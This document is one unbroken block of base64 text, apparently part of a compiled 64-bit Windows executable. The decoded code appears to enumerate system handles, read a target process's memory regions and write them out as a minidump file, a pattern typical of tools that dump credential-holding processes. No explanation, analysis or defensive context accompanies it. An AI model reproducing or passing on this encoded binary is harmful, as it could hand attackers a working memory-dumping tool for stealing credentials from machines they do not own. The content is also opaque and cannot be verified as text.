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bHRa4AAEjHRbAAAAAASMdFuAAAAADHRYwwAAAASMeFUP///wAAAABIx4VY////AAAAAEjHhWD///8AAAAASMeFaP///wAAAABIx4Vw////AAAAAEjHhXj///8AAAAAx0XMAAAAAItFzEiNlVD///9IAcIPt0WQZokCg0XMAotFzEiNlVD///9IAcIPt0WSZokCg0XMAotFzEiNlVD///9IAcIPt0WUZokCg0XMAotFzEiNlVD///9IAcIPtkWWiAKDRcwBi0XMSI2VUP///0gBwg+2RZeIAoNFzAGLRcxIjZVQ////SAHCi0WYiQKDRcwEi0XMSI2VUP///0gBwotFnIkCg0XMBItFzEiNlVD///9IAcKLRaCJAoNFzASLRcxIjZVQ////SAHCi0WkiQKDRcwEi0XMSI2VUP///0gBwotFqIkCg0XMBItFzEiNlVD///9IAcIPt0WsZokCg0XMAotFzEiNlVD///9IAcIPt0WuZokCg0XMAotFzEiNlVD///9IAcJIi0WwSIkCg0XMCItFzEiNlVD///9IAcJIi0W4SIkCSItFEItAEImFTP///4tVjEiNhVD///9BidBIicJIi00Q6FH5//+FwHUKuAAAAADpzwAAAEiNRYxBuQQAAABJicC6JAAAAEiLTRDo3/j//0iNhUz///9BuQQAAABJicC6KAAAAEiLTRDowfj//0iLRRCLQBCJhUj///9Ii0XQD7cAD7fAiYVE////SI2FRP///0G4BAAAAEiJwkiLTRDo1Pj//4XAdQe4AAAAAOtVSItF0A+3AA+30EiLRdBIi0AIQYnQSInCSItNEOio+P//hcB1B7gAAAAA6ymLhUz///+DwBhIjZVI////QbkEAAAASYnQicJIi00Q6DD4//+4AQAAAEiBxOAAAABdw1VXSIHs2AEAAEiNrCSAAAAASImNcAEAAEiNBVypAABIiYWgAAAASI0FZKkAAEiJhagAAABIjQVsqQAASImFsAAAAEiNBXKpAABIiYW4AAAASI0FfKkAAEiJhcAAAABIjQWIqQAASImFyAAAAEiNBZKpAABIiYXQAAAASI0FnqkAAEiJhdgAAABIjQWmqQAASImF4AAAAEiNBbKpAABIiYXoAAAASI0FuKkAAEiJhfAAAABIjQXAqQAASImF+AAAAEiNBcipAABIiYUAAQAASI0F0K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5Ii0XwSInB6Get//9Ix0XwAAAAALgAAAAA6ZIBAABIi0X4SIsASIlF+EiDffgAD4Vy////SI1F1EG5BAAAAEmJwLo8AAAASItNIOh07P//SI1F4EG5BAAAAEmJwLpAAAAASItNIOhZ7P//SItF8EiJRfjpKgEAAEiLRfhIi1gQSIsF5goBAP/QSYnYuggAAABIicFIiwXiCgEA/9BIiUXoSIN96AB1CrgAAAAA6f8AAABIi0X4SItIEEiLRfhIi0AISYnCSItFIEiLAEiLVehIx0QkIAAAAABJiclJidBMidJIicHoe8///4lF5EiLRfhIi0AQicJIi0XoQYnQSInCSItNIOgD7P//hcB1REiLRfBIicHoWqz//0jHRfAAAAAASIsFRAoBAP/QSItV6EmJ0LoAAAAASInBSIsFRAoBAP/QSMdF6AAAAAC4AAAAAOtfSItF+EiLUBBIi0XoSYnQugAAAABIicHoW34AAEiLBfgJAQD/0EiLVehJidC6AAAAAEiJwUiLBfgJAQD/0EjHRegAAAAASItF+EiLAEiJRfhIg334AA+Fy/7//0iLRfBIg8R4W13DVUiJ5UiD7DBIiU0QSItNEOg17P//hcB1CrgAAAAA6akAAABIi00Q6B3u//+FwHUKuAAAAADpkgAAAEiLTRDoB+///4XAdQe4AAAAAOt+SItNEOiT8v//SIlF+EiDffgAdQe4AAAAAOtjSItF+EiJwkiLTRDoaPz//0iJRfBIg33wAHUbSItF+EiJwegsq///SMdF+AAAAAC4AAAAAOstSItF+EiJwegRq///SMdF+AAAAABIi0XwSInB6P2q//9Ix0XwAAAAALgBAAAASIPEMF3DkJCQkJCQkFVIieVIg+wwSIlNEEiJVRhMiUUgTIlNKEiNRSBIiUXwSItV8EiLRRhJidBIicJIi00Q6DknAACJRfyLRfxIg8QwXcNVSInlSIPsIEiJTRC5AQAAAEiLBeWGAAD/0EyLRRBIjRXYnAAASInB6JD///+5AQAAAEiLBcSGAAD/0EiNFVSdAABIicHoc////7kBAAAASIsFp4YAAP/QSI0VOZ0AAEiJwehW////uQEAAABIiwWKhgAA/9BIjRUanQAASInB6Dn///+5AQAAAEiLBW2GAAD/0EiNFQydAABIicHoHP///7kBAAAASIsFUIYAAP/QSI0V4JwAAEiJwej//v//uQEAAABIiwUzhgAA/9BIjRUCnQAASInB6OL+//+5AQAAAEiLBRaGAAD/0EiNFaacAABIicHoxf7//7kBAAAASIsF+YUAAP/QSI0V8JwAAEiJweio/v//uQEAAABIiwXchQAA/9BIjRVsnAAASInB6Iv+//+5AQAAAEiLBb+FAAD/0EiNFdecAABIicHobv7//7kBAAAASIsFooUAAP/QSI0VMpwAAEiJwehR/v//uQEAAABIiwWFhQAA/9BIjRW0nAAASInB6DT+//+5AQAAAEiLBWiFAAD/0EiNFfibAABIicHoF/7//7kBAAAASIsFS4UAAP/QSI0Vq5wAAEiJwej6/f//uQEAAABIiwUuhQAA/9BIjRW+mwAASInB6N39//+5AQAAAEiLBRGFAAD/0EiNFYCcAABIicHowP3//7kBAAAASIsF9IQAAP/QSI0VhJsAAEiJweij/f//uQEAAABIiwXXhAAA/9BIjRV5nAAASInB6Ib9//+5AQAAAEiLBbqEAAD/0EiNFUqbAABIicHoaf3//7kBAAAASIsFnYQAAP/QSI0VVJwAAEiJwehM/f//uQEAAABIiwWAhAAA/9BIjRUQmwAASInB6C/9//+5AQAAAEiLBWOEAAD/0EiNFVGcAABIicHoEv3//7kBAAAASIsFRoQAAP/QSI0V1poAAEiJwej1/P//uQEAAABIiwUphAAA/9BIjRUonAAASInB6Nj8//+5AQAAAEiLBQyEAAD/0EiNFZyaAABIicHou/z//7kBAAAASIsF74MAAP/QSI0VHZwAAEiJweie/P//uQEAAABIiwXSgwAA/9BIjRVimgAASInB6IH8//+5AQAAAEiLBbWDAAD/0EiNFfybAABIicHoZPz//7kBAAAASIsFmIMAAP/QSI0VKJoAAEiJwehH/P//uQEAAABIiwV7gwAA/9BIjRUCnAAASInB6Cr8//+5AQAAAEiLBV6DAAD/0EiNFe6ZAABIicHoDfz//7kBAAAASIsFQYMAAP/QSI0V8JsAAEiJwejw+///uQEAAABIiwUkgwAA/9BIjRW0mQAASInB6NP7//+5AQAAAEiLBQeDAAD/0EiNFQKcAABIicHotvv//7kBAAAASIsF6oIAAP/QSI0VepkAAEiJweiZ+///uQEAAABIiwXNggAA/9BIjRXcmwAASInB6Hz7//+5AQAAAEiLBbCCAAD/0EiNFUCZAABIicHoX/v//5BIg8QgXcNVV1ZTSIHsGAMAAEiNrCSAAAAAiY3AAgAASImVyAIAAOiTEgAAx4WMAgAAAAAAAEjHhYACAAAAAAAAx4V8AgAAAAAAAMeFeAIAAAAAAADHhXQCAAAAAAAAx4VwAgAAAAAAAEjHhWgCAAAAAAAAx4VkAgAAAAAAAMeFYAIAAAAAAADHhVwCAAAAAAAAx4VYAgAAAAAAAMeFVAIAAAAAAABIx4VIAgAAAAAAAEjHhfgBAAAAAAAASMeF8AEAAAAAAABIjUXgSIlF2GbHRdAAAGbHRdIAAEjHhQgCAAAAAAAASMeFGAIAAAAAAADHhUQCAAABAAAA6aQJAACLhUQCAABImEiNFMUAAAAASIuFyAIAAEgB0EiLAEiJwkiNBb6aAAC5CQAAAEiJ1kiJx/OmD5fAD5LCKdAPvsCFwHUPx4VcAgAAAQAAAOlLCQAAi4VEAgAASJhIjRTFAAAAAEiLhcgCAABIAdBIiwBIicJIjQV1mgAAuQMAAABIidZIicfzpg+XwA+SwinQD77AhcB0Q4uFRAIAAEiYSI0UxQAAAABIi4XIAgAASAHQSIsASInCSI0FNZoAALkIAAAASInWSInH86YPl8APksIp0A++wIXAdQ/HhWACAAABAAAA6bYIAACLhUQCAABImEiNFMUAAAAASIuFyAIAAEgB0EiLAEiJwkiNBeuZAAC5AwAAAEiJ1kiJx/OmD5fAD5LCKdAPvsCFwHRHi4VEAgAASJhIjRTFAAAAAEiLhcgCAABIAdBIiwBIicJIjQWrmQAAuQgAAABIidZIicfzpg+XwA+SwinQD77AhcAPhZgAAACLhUQCAACDwAE5hcACAAB/RLkBAAAASIsFEYAAAP/QSI0VbZkAAEiJwejA+P//uQEAAABIiwX0fwAA/9BIjRWElgAASInB6KP4//+4AAAAAOkuDwAAg4VEAgAAAYuFRAIAAEiYSI0UxQAAAABIi4XIAgAASAHQSIsASImFaAIAAEiLlWgCAABIjUXQSInB6OCa///plAcAAIuFRAIAAEiYSI0UxQAAAABIi4XIAgAASAHQSIsASInCSI0F6pgAALkDAAAASInWSInH86YPl8APksIp0A++wIXAdEeLhUQCAABImEiNFMUAAAAASIuFyAIAAEgB0EiLAEiJwkiNBaqYAAC5BgAAAEiJ1kiJx/OmD5fAD5LCKdAPvsCFwA+FUQEAAIuFRAIAAIPAATmFwAIAAH9EuQEAAABIiwXvfgAA/9BIjRVqmAAASInB6J73//+5AQAAAEiLBdJ+AAD/0EiNFWKVAABIicHogff//7gAAAAA6QwOAACDhUQCAAABi4VEAgAASJhIjRTFAAAAAEiLhcgCAABIAdBIiwBIicHoI3QAAImFjAIAAIO9jAIAAAB0XYuFRAIAAEiYSI0UxQAAAABIi4XIAgAASAHQSIsASI0V8JcAAEiJweiQdAAASInDi4VEAgAASJhIjRTFAAAAAEiLhcgCAABIAdBIiwBIicHoSHQAAEg5ww+EHAYAAIuFRAIAAEiYSI0UxQAAAABIi4XIAgAASAHQSIsYuQEAAABIiwX2fQAA/9BJidhIjRWNlwAASInB6KL2//+5AQAAAEiLBdZ9AAD/0EiNFWaUAABIicHohfb//7gAAAAA6RANAACLhUQCAABImEiNFMUAAAAASIuFyAIAAEgB0EiLAEiJwkiNBUeXAAC5AwAAAEiJ1kiJx/OmD5fAD5LCKdAPvsCFwHRDi4VEAgAASJhIjRTFAAAAAEiLhcgCAA